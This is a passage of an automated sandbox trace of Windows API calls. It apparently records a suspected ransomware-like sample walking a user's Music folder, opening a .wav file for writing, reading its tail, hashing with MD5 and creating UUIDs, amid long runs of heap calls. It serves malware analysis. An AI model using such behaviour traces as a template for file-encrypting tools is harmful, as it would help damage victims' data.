RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\-b6nU6H6 U_8u\\") returned="-b6nU6H6 U_8u\\" [0098.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\") returned="PruBsWuwCDlLwiCR\\" [0098.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\") returned="-u63kcF\\" [0098.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\") returned="44M5AK\\" [0098.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0098.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.968] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.968] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.968] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.968] PathFindFileNameW (pszPath="") returned="" [0098.968] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\-b6nU6H6 U_8u\\hR kmfu2wNIUHpsVI.wav") returned=".wav" [0098.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\-b6nU6H6 U_8u\\hR kmfu2wNIUHpsVI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\-b6nu6h6 u_8u\\hr kmfu2wniuhpsvi.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0098.969] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=1551) returned 1 [0098.969] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0098.971] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.971] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0098.972] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0098.973] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0098.973] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.973] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0098.973] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0098.973] GetLastError () returned 0x0 [0098.973] CryptDestroyHash (hHash=0x31c7580) returned 1 [0098.973] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0098.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.974] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0098.974] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.974] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0098.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x610) returned 0x316e2e0 [0098.974] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbf08 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5150 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbf50 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5168 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5198 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51b0 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0098.974] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0098.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0098.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5198 | out: hHeap=0x680000) returned 1 [0098.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51b0 | out: hHeap=0x680000) returned 1 [0098.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0098.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e51b0 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5198 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x3191cf0 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0098.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51b0 | out: hHeap=0x680000) returned 1 [0098.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5198 | out: hHeap=0x680000) returned 1 [0098.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0098.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.976] GetCurrentThreadId () returned 0x8c4 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fadf0 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.976] GetCurrentThreadId () returned 0x8c4 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0098.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0098.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5198 [0098.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0098.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0098.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51b0 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5180 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e51c8 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0098.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5198 | out: hHeap=0x680000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5198 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5198 | out: hHeap=0x680000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0098.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51c8 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51b0 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5180 | out: hHeap=0x680000) returned 1 [0098.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 